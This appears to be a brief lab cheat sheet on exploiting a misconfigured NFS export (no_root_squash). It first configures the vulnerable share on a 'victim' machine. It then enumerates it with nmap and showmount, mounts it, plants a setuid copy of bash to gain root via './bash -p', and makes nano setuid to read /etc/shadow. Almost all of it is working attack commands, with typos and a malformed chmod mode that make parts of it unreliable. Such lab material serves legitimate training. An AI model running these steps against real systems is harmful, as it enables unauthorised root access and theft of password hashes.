<<<<< NFS MISCONFIGURATION ENUMERATION >>>>>
******* in victim machine ********
apt install nfs-kernel-server
nano /etc/exports 
add >> /home *(rw,no_root_squash)
restart the server >> sudo /etc/init.d/nfs-kernel-server restart

**********in attacker machine************
nmap -sV --script=nfs-showmount ip_address
manual scanning >> apt get install nfs-common
showmount -e ip_address

To exploit nfs server 
mkdir /tmp/nfs
mount -t nfs ip:/home/tmp/nfs
cd /tmp/nfs
cp /bin/bash
chmod +s bash
ls -la bash

Priev escalation
in ubunto ssh connection
cd /home
ls
./bash -p 
id 
whoami
cp /bin/nano
chmod 47777 nano
ls -la nano
./nano -p /etc/shadow
